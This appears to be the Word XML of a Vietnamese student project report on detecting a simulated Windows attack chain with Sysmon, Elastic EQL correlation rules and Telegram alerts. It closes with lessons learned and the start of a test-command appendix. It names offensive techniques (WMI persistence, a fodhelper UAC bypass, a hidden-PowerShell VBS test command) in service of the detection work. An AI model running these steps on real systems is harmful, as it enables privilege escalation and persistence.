      <w:r w:rsidR="00AE5057">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> ║</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE199AD" w14:textId="3DAD59D2"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[S1] VBScript  [S2] PS Flags  [S3] WMI Spawn                 </w:t>
      </w:r>
      <w:r w:rsidR="00AE5057">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> ║</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD1807A" w14:textId="2CC66F73"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[S4] SYSTEM HTTPS   </w:t>
      </w:r>
      <w:r w:rsidR="00A863A4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                   </w:t>
      </w:r>
      <w:r w:rsidR="00AE5057">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  ║</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033AA144" w14:textId="01DAC802"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Single events — FP trung bình — Early warning               </w:t>
      </w:r>
      <w:r w:rsidR="00AE5057">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  ║</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B49521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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E02D61" w14:textId="10FA3086"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Lớp 1 — Log Collection (Sysmon + Elastic Agent)             </w:t>
      </w:r>
      <w:r w:rsidR="00AE5057">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  ║</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2139C2F9" w14:textId="05C4EFC8"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EID: 1, 3, 11, 13, 19, 20, 21, 23 — Raw telemetry          </w:t>
      </w:r>
      <w:r w:rsidR="00AE5057">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  ║</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF9910A" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:sz="10" w:space="0" w:color="555555"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="80" w:line="256" w:lineRule="auto"/>
        <w:ind w:left="240" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>╚══════════════════════════════════════════════════════════════════╝</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643E0A84" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00B01B4A">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B265AA5" w14:textId="3BDE4193" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00A863A4">
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>.2 Luồng Alert và Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49704CF9" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:sz="10" w:space="0" w:color="555555"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="80" w:line="256" w:lineRule="auto"/>
        <w:ind w:left="240" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Attack Event (endpoint)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7445CEE9"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351FB469"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v</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C58EC0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Sysmon (EID 1/3/11/13/19/20/21/23)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A646247"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181AF01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v</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C78B7CE"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Elastic Agent -&gt; Elasticsearch (logs-windows.sysmon_operational-*)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E304EC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3E4BD6B4" w14:textId="64FEA66C"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+-----------&gt; Signal Rules (S1-S</w:t>
      </w:r>
      <w:r w:rsidR="00A863A4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>) --- Minor/Medium alerts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E78951F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FDCF61"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v Telegram (nếu severity High/Critical)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E09A5A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2325341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+-----------&gt; Correlation Rules (C1-C5) --- Phase alerts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654D0FB4"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58605E0E" w14:textId="623C62AC"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                    v Telegram (tất cả C</w:t>
      </w:r>
      <w:r w:rsidR="006D2C1A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>orrelation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> rules)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04052DFC"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B658C49" w14:textId="729327A1" w:rsidR="00A863A4" w:rsidRDefault="00000000" w:rsidP="00A863A4">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+-----------&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00A863A4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Telegram URGENT + Kibana Case</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0659533C" w14:textId="28D9C2C5" w:rsidR="00B01B4A" w:rsidRDefault="00A863A4" w:rsidP="00A863A4">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:sz="10" w:space="0" w:color="555555"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="80" w:line="256" w:lineRule="auto"/>
        <w:ind w:left="240" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                   Incident Response Activated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB7851F" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7AF2CC" w14:textId="7816155F" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="AAAAAA"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>XI</w:t>
      </w:r>
      <w:r w:rsidR="00A863A4">
        <w:t>II</w:t>
      </w:r>
      <w:r>
        <w:t>. KẾT LUẬN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C12B3E" w14:textId="3EB8BF3A" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00A863A4">
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>.1 Kiến Thức Thu Được</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA4A6AA" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Đồ án đã cung cấp kiến thức thực tế sâu về nhiều lĩnh vực kỹ thuật quan trọng trong an toàn thông tin:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109AA9FE" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Hiểu sâu về cơ chế WMI Event Subscription trên Windows — kiến trúc nội bộ của __EventFilter, CommandLineEventConsumer và __FilterToConsumerBinding, cách chúng tương tác với WMI repository và WmiPrvSE.exe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18782DC6" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Nắm vững kỹ thuật UAC Bypass qua fodhelper.exe — autoElevate manifest, cơ chế Windows tự nâng quyền, và tại sao ms-settings registry key là invariant không thể tránh.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5580B6C2" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Hiểu rõ tại sao LOLBins-based attack khó phát hiện bằng signature-based detection và tại sao behavioral detection là phương pháp đúng đắn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F0024C" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Kỹ năng viết EQL correlation rules với sequence logic, timing constraints (maxspan) và behavioral invariants — phân biệt rõ giữa Correlation Rules và Signal Rules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239504F0" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Kinh nghiệm cấu hình Sysmon để cover đúng EventID cần thiết cho từng detection objective, đặc biệt là EID 11 (FileCreate) cho T1005/T1560 và EID 23 (FileDelete) cho T1070.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EB312C" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Hiểu về Elastic Agent ECS field mapping và cách xử lý field mapping inconsistency (process.parent.name vs winlog.event_data.ParentImage) trong thực tế.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CA317D" w14:textId="4ADA7D72" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00A863A4">
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>.2 Khó Khăn Gặp Phải</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D94D59" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>WMI Consumer chạy trong Session 0 không có user context — hạn chế một số PowerShell operations như DPAPI, screen capture. Giải pháp: dùng SYSTEM privileges để đọc file system trực tiếp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35790701" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>PowerShell here-string lồng nhau (nested here-string) khi payload.ps1 viết svhw.ps1. Giải pháp: dùng Set-Content với @'...'@ single-quote here-string.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0E89A0" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>process.parent.name field không luôn được Elastic Agent populate nhất quán với tất cả EventID, đặc biệt trong network events (EID 3). Giải pháp: dùng user.name:SYSTEM làm discriminator thay vì parent process filter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC2BE47" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Sysmon EventID 11 (FileCreate) không được cấu hình ban đầu — khiến C4 không có data. Giải pháp: cập nhật Sysmon config với FileCreate include rule cho các staging paths.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290A8D13" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Sequence rule timeout khi maxspan quá ngắn trên VM bị throttle. Giải pháp: tăng maxspan từ 15s lên 30s cho C1, từ 60s lên 120s cho C5.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D2DF4E" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Rule C1 ban đầu không fire do dùng process.parent.name:fodhelper.exe cho powershell.exe — nhưng trong attack chain, powershell là con của wscript.exe, không phải fodhelper. Giải pháp: chuyển C1 sang sequence approach.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CD7F29" w14:textId="3F8FECE7" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00A863A4">
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>.3 Hướng Phát Triển</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E944133" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Bổ sung PowerShell Script Block Logging (EventID 4104) để capture nội dung script đầy đủ — quan trọng để xem payload thực tế trong Consumer CommandLineTemplate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189644BB" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Xây dựng detection cho các UAC bypass technique khác: computerdefaults.exe, sdclt.exe, SilentCleanup — hiện C1 chỉ cover fodhelper.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D76F82" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Triển khai DNS logging (Sysmon EventID 22) để phát hiện C2 domain resolution — bổ sung lớp detection cho exfiltration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDDA331" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Nghiên cứu ML-based behavioral detection để giảm dependency vào static pattern matching và cover các bypass scenario chưa được biết đến.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CA8E42" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Mở rộng attack chain sang Lateral Movement (T1021) và Credential Dumping (T1003) để tăng độ phức tạp và thực tế của simulation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C02C67" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Xây dựng automated threat hunting queries dựa trên hunt hypotheses từ MITRE ATT&amp;CK để chủ động tìm kiếm attacker đã qua mặt detection rules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77744E9F" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F9167C" w14:textId="0F80369C" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="AAAAAA"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>X</w:t>
      </w:r>
      <w:r w:rsidR="00A863A4">
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:t>V. PHỤ LỤC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E05C1A" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Phụ lục A — Test Commands Tổng Hợp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3A2F1B" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Bảng tổng hợp test commands cho tất cả 7 phases và expected detection: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1594"/>
        <w:gridCol w:w="3217"/>
        <w:gridCol w:w="3475"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B01B4A" w14:paraId="1AFCF7D2" w14:textId="77777777" w:rsidTr="00A863A4">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="740"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122DFA99" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Phase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1594"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08F3869E" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Rule Fire</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3217"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0180165F" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Test Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3475"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29E6EC1E" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Expected Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="3F02D412" w14:textId="77777777" w:rsidTr="00A863A4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="74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5BBE5C0" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>P2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1594"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469F09F" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>S1, S2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3217"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F40DB5B" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>wscript.exe $env:TEMP\test.vbs (với PS hidden content)</w:t>
            </w:r>
          </w:p>
